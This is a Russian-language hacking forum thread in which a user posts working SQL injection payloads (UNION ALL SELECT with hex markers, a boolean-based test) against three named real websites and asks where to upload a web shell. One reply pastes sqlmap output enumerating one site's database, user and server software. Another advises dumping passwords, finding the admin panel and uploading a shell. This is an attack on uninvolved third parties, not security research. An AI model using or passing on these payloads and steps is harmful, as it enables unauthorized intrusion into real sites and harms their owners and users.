Помогите залить Shell (Mysql Injection)

Discussion in 'Уязвимости' started by Миxей, 2 Apr 2018.

  1. Миxей

    Миxей Member

    Joined:
    26 Aug 2009
    Messages:
    0
    Likes Received:
    12
    Reputations:
    0
    woodlandcenters.com/news.php?id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x796342494373766a436e43444850717857576b696a64565a5074476165714b644c63614a6a4b7675,0x716a707a71)-- NzCQ

    arvsolutions.co.uk/news.php?id=39
    ' AND 3547=3547 AND 'OEvV'='OEvV

    justindellojoio.com/news.php?id=12 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634e55624c6143584167734f435768575273425876636a6d6376635874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC

    Как узнать папку в которую можно залить shell ?
     
  2. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    599
    Likes Received:
    451
    Reputations:
    65
    Господи помилуй этого человека..

    [23:20:32] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.7, PHP 5.5.9
    back-end DBMS: MySQL >= 5.0.12
    [23:20:32] [INFO] fetching current user
    current user: 'justin@localhost'
    [23:20:33] [INFO] fetching current database
    current database: 'justin'
    [23:20:33] [INFO] testing if current user is DBA
    [23:20:33] [INFO] fetching current user
    [23:20:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    current user is DBA: False
    [23:20:33] [INFO] fetching database names
    available databases [2]:
    [*] information_schema
    [*] justin


    https://www.aldeid.com/wiki/From-common-sql-injection-to-system-compromise
     
    ms13 likes this.
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,562
    Reputations:
    40
    Через уязвимость никак, сливайте пароль, ищите админку и пробуйте заливать шелл
     
  4. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    599
    Likes Received:
    451
    Reputations:
    65

    Найди пол часа свободного времени для ознакомления
    https://www.tenable.com/blog/configuration-auditing-phpini-to-help-prevent-web-application-attacks

    Да бы знать что одних привелегий на запись файлов еще не досаточно. И вопрос по папкам там тоже присутствует.
     
Loading...